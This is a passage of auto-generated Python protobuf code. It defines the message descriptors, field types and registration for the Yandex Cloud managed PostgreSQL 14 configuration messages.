_descriptor.FieldDescriptor(
name='enable_memoize', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_memoize', index=134,
number=140, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_recovery_conflict_waits', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_recovery_conflict_waits', index=135,
number=141, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_failsafe_age', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_failsafe_age', index=136,
number=142, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_multixact_failsafe_age', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_multixact_failsafe_age', index=137,
number=143, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_qualstats_enabled', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_qualstats_enabled', index=138,
number=144, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_qualstats_track_constants', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_qualstats_track_constants', index=139,
number=145, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_qualstats_max', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_qualstats_max', index=140,
number=146, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_qualstats_resolve_oids', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_qualstats_resolve_oids', index=141,
number=147, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_qualstats_sample_rate', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_qualstats_sample_rate', index=142,
number=148, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_POSTGRESQLCONFIG14_WALLEVEL,
_POSTGRESQLCONFIG14_SYNCHRONOUSCOMMIT,
_POSTGRESQLCONFIG14_CONSTRAINTEXCLUSION,
_POSTGRESQLCONFIG14_FORCEPARALLELMODE,
_POSTGRESQLCONFIG14_LOGLEVEL,
_POSTGRESQLCONFIG14_LOGERRORVERBOSITY,
_POSTGRESQLCONFIG14_LOGSTATEMENT,
_POSTGRESQLCONFIG14_TRANSACTIONISOLATION,
_POSTGRESQLCONFIG14_BYTEAOUTPUT,
_POSTGRESQLCONFIG14_XMLBINARY,
_POSTGRESQLCONFIG14_XMLOPTION,
_POSTGRESQLCONFIG14_BACKSLASHQUOTE,
_POSTGRESQLCONFIG14_PLANCACHEMODE,
_POSTGRESQLCONFIG14_PGHINTPLANDEBUGPRINT,
_POSTGRESQLCONFIG14_SHAREDPRELOADLIBRARIES,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=163,
serialized_end=12480,
)
_POSTGRESQLCONFIGSET14 = _descriptor.Descriptor(
name='PostgresqlConfigSet14',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfigSet14',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='effective_config', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfigSet14.effective_config', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_config', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfigSet14.user_config', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_config', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfigSet14.default_config', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12483,
serialized_end=12754,
)
_POSTGRESQLCONFIG14.fields_by_name['max_connections'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['shared_buffers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['temp_buffers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_prepared_transactions'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['work_mem'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['maintenance_work_mem'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_work_mem'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['temp_file_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_cost_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_cost_page_hit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_cost_page_miss'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_cost_page_dirty'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_cost_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_lru_maxpages'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_lru_multiplier'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_flush_after'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['backend_flush_after'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['old_snapshot_threshold'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['wal_level'].enum_type = _POSTGRESQLCONFIG14_WALLEVEL
_POSTGRESQLCONFIG14.fields_by_name['synchronous_commit'].enum_type = _POSTGRESQLCONFIG14_SYNCHRONOUSCOMMIT
_POSTGRESQLCONFIG14.fields_by_name['checkpoint_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['checkpoint_completion_target'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['checkpoint_flush_after'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_wal_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['min_wal_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_standby_streaming_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['default_statistics_target'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['constraint_exclusion'].enum_type = _POSTGRESQLCONFIG14_CONSTRAINTEXCLUSION
_POSTGRESQLCONFIG14.fields_by_name['cursor_tuple_fraction'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['from_collapse_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['join_collapse_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['force_parallel_mode'].enum_type = _POSTGRESQLCONFIG14_FORCEPARALLELMODE
_POSTGRESQLCONFIG14.fields_by_name['client_min_messages'].enum_type = _POSTGRESQLCONFIG14_LOGLEVEL
_POSTGRESQLCONFIG14.fields_by_name['log_min_messages'].enum_type = _POSTGRESQLCONFIG14_LOGLEVEL
_POSTGRESQLCONFIG14.fields_by_name['log_min_error_statement'].enum_type = _POSTGRESQLCONFIG14_LOGLEVEL
_POSTGRESQLCONFIG14.fields_by_name['log_min_duration_statement'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['log_checkpoints'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_connections'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_disconnections'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_duration'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_error_verbosity'].enum_type = _POSTGRESQLCONFIG14_LOGERRORVERBOSITY
_POSTGRESQLCONFIG14.fields_by_name['log_lock_waits'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_statement'].enum_type = _POSTGRESQLCONFIG14_LOGSTATEMENT
_POSTGRESQLCONFIG14.fields_by_name['log_temp_files'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['row_security'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['default_transaction_isolation'].enum_type = _POSTGRESQLCONFIG14_TRANSACTIONISOLATION
_POSTGRESQLCONFIG14.fields_by_name['statement_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['lock_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['idle_in_transaction_session_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['bytea_output'].enum_type = _POSTGRESQLCONFIG14_BYTEAOUTPUT
_POSTGRESQLCONFIG14.fields_by_name['xmlbinary'].enum_type = _POSTGRESQLCONFIG14_XMLBINARY
_POSTGRESQLCONFIG14.fields_by_name['xmloption'].enum_type = _POSTGRESQLCONFIG14_XMLOPTION
_POSTGRESQLCONFIG14.fields_by_name['gin_pending_list_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['deadlock_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_locks_per_transaction'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_pred_locks_per_transaction'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['array_nulls'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['backslash_quote'].enum_type = _POSTGRESQLCONFIG14_BACKSLASHQUOTE
_POSTGRESQLCONFIG14.fields_by_name['default_with_oids'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['escape_string_warning'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['lo_compat_privileges'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['quote_all_identifiers'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['standard_conforming_strings'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['synchronize_seqscans'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['transform_null_equals'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['exit_on_error'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['seq_page_cost'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['random_page_cost'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_max_workers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_cost_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_cost_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_naptime'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['archive_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['track_activity_query_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_bitmapscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_hashagg'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_hashjoin'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_indexscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_indexonlyscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_material'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_mergejoin'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_nestloop'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_seqscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_sort'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_tidscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['max_worker_processes'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_parallel_workers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_parallel_workers_per_gather'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_scale_factor'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_analyze_scale_factor'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['default_transaction_read_only'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_parallel_append'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_parallel_hash'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_partition_pruning'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_partitionwise_aggregate'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_partitionwise_join'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['jit'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['max_parallel_maintenance_workers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['parallel_leader_participation'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_transaction_sample_rate'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['plan_cache_mode'].enum_type = _POSTGRESQLCONFIG14_PLANCACHEMODE
_POSTGRESQLCONFIG14.fields_by_name['effective_io_concurrency'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['effective_cache_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['shared_preload_libraries'].enum_type = _POSTGRESQLCONFIG14_SHAREDPRELOADLIBRARIES
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_min_duration'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_analyze'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_buffers'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_timing'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_triggers'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_verbose'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_nested_statements'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_sample_rate'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_hint_plan_enable_hint'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_hint_plan_enable_hint_table'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_hint_plan_debug_print'].enum_type = _POSTGRESQLCONFIG14_PGHINTPLANDEBUGPRINT
_POSTGRESQLCONFIG14.fields_by_name['pg_hint_plan_message_level'].enum_type = _POSTGRESQLCONFIG14_LOGLEVEL
_POSTGRESQLCONFIG14.fields_by_name['hash_mem_multiplier'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['logical_decoding_work_mem'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['maintenance_io_concurrency'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_slot_wal_keep_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['wal_keep_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_incremental_sort'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_insert_threshold'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_insert_scale_factor'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_min_duration_sample'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['log_statement_sample_rate'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_parameter_max_length'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['log_parameter_max_length_on_error'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['client_connection_check_interval'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_async_append'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_gathermerge'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['enable_memoize'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['log_recovery_conflict_waits'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_failsafe_age'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['vacuum_multixact_failsafe_age'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_qualstats_enabled'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_qualstats_track_constants'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_qualstats_max'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_qualstats_resolve_oids'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLCONFIG14.fields_by_name['pg_qualstats_sample_rate'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLCONFIG14_WALLEVEL.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_SYNCHRONOUSCOMMIT.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_CONSTRAINTEXCLUSION.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_FORCEPARALLELMODE.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_LOGLEVEL.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_LOGERRORVERBOSITY.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_LOGSTATEMENT.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_TRANSACTIONISOLATION.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_BYTEAOUTPUT.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_XMLBINARY.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_XMLOPTION.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_BACKSLASHQUOTE.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_PLANCACHEMODE.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_PGHINTPLANDEBUGPRINT.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIG14_SHAREDPRELOADLIBRARIES.containing_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIGSET14.fields_by_name['effective_config'].message_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIGSET14.fields_by_name['user_config'].message_type = _POSTGRESQLCONFIG14
_POSTGRESQLCONFIGSET14.fields_by_name['default_config'].message_type = _POSTGRESQLCONFIG14
DESCRIPTOR.message_types_by_name['PostgresqlConfig14'] = _POSTGRESQLCONFIG14
DESCRIPTOR.message_types_by_name['PostgresqlConfigSet14'] = _POSTGRESQLCONFIGSET14
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PostgresqlConfig14 = _reflection.GeneratedProtocolMessageType('PostgresqlConfig14', (_message.Message,), {
'DESCRIPTOR' : _POSTGRESQLCONFIG14,
'__module__' : 'yandex.cloud.mdb.postgresql.v1.config.postgresql14_pb2'
# @@protoc_insertion_point(class_scope:yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14)
})
_sym_db.RegisterMessage(PostgresqlConfig14)
PostgresqlConfigSet14 = _reflection.GeneratedProtocolMessageType('PostgresqlConfigSet14', (_message.Message,), {
'DESCRIPTOR' : _POSTGRESQLCONFIGSET14,
'__module__' : 'yandex.cloud.mdb.postgresql.v1.config.postgresql14_pb2'
# @@protoc_insertion_point(class_scope:yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfigSet14)
})
_sym_db.RegisterMessage(PostgresqlConfigSet14)
DESCRIPTOR._options = None
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_delay']._options = None
_POSTGRESQLCONFIG14.fields_by_name['bgwriter_flush_after']._options = None
_POSTGRESQLCONFIG14.fields_by_name['backend_flush_after']._options = None
_POSTGRESQLCONFIG14.fields_by_name['old_snapshot_threshold']._options = None
_POSTGRESQLCONFIG14.fields_by_name['checkpoint_timeout']._options = None
_POSTGRESQLCONFIG14.fields_by_name['checkpoint_flush_after']._options = None
_POSTGRESQLCONFIG14.fields_by_name['from_collapse_limit']._options = None
_POSTGRESQLCONFIG14.fields_by_name['join_collapse_limit']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_max_workers']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_cost_delay']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_cost_limit']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_naptime']._options = None
_POSTGRESQLCONFIG14.fields_by_name['archive_timeout']._options = None
_POSTGRESQLCONFIG14.fields_by_name['track_activity_query_size']._options = None
_POSTGRESQLCONFIG14.fields_by_name['max_worker_processes']._options = None
_POSTGRESQLCONFIG14.fields_by_name['max_parallel_workers']._options = None
_POSTGRESQLCONFIG14.fields_by_name['max_parallel_workers_per_gather']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_scale_factor']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_analyze_scale_factor']._options = None
